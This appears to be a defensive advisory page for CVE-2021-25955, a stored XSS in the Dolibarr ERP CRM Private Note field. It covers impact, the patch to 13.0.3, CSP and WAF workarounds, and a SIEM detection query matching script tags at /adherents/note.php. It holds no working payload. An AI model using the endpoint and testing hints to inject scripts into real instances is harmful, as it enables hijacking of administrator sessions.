CVE-2021-25955
📋 TL;DR
Dolibarr ERP CRM versions 2.8.1 to 13.0.2 contain a stored cross-site scripting (XSS) vulnerability in the WYSIWYG Editor module's Private Note field. Low-privileged users can inject malicious scripts that execute when victims view the notes, potentially leading to session hijacking and privilege escalation. The vulnerability is particularly dangerous because administrators are likely targets.
💻 Affected Systems
- Dolibarr ERP CRM
📦 What is this software?
Dolibarr by Dolibarr
⚠️ Risk & Real-World Impact
Worst Case
Administrator account takeover via session ID theft, leading to full system compromise and privilege escalation across the Dolibarr instance.
Likely Case
Low-privileged user steals session cookies from administrators or other users, enabling unauthorized access and potential data exfiltration.
If Mitigated
Script execution blocked by CSP headers or input sanitization, limiting impact to UI disruption without data theft.
🎯 Exploit Status
Exploitation requires authenticated low-privileged access. The vulnerability is well-documented with public details.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 13.0.3 and later
Vendor Advisory: https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e
Restart Required: No
Instructions:
1. Update Dolibarr to version 13.0.3 or later. 2. Apply the security patch from the GitHub commit. 3. Verify the fix by testing the Private Note field for XSS.
🔧 Temporary Workarounds
Disable WYSIWYG Editor for Private Notes
allDisable the WYSIWYG editor functionality for the Private Note field to prevent script injection.
Modify Dolibarr configuration to use plain text input for note fields.
Implement Content Security Policy (CSP)
allAdd CSP headers to block inline script execution and restrict script sources.
Add 'Content-Security-Policy: script-src 'self'' header to web server configuration.
🧯 If You Can't Patch
- Restrict access to the /adherents/note.php endpoint to trusted users only.
- Implement web application firewall (WAF) rules to block XSS payloads in note fields.
🔍 How to Verify
Check if Vulnerable:
Test if script tags can be saved and executed in the Private Note field at /adherents/note.php?id=1.Check Version:
Check Dolibarr version in administration panel or via 'cat /path/to/dolibarr/htdocs/includes/version.php'.Verify Fix Applied:
Attempt to inject and execute script payloads in the Private Note field; execution should be blocked.📡 Detection & Monitoring
Log Indicators:
- Unusual note creation/modification patterns
- Requests to /adherents/note.php with script-like payloads
Network Indicators:
- HTTP requests containing script tags or JavaScript in note parameters
SIEM Query:
source="web_logs" AND uri="/adherents/note.php" AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")🔗 References
- https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e
- https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955
- https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e
- https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955
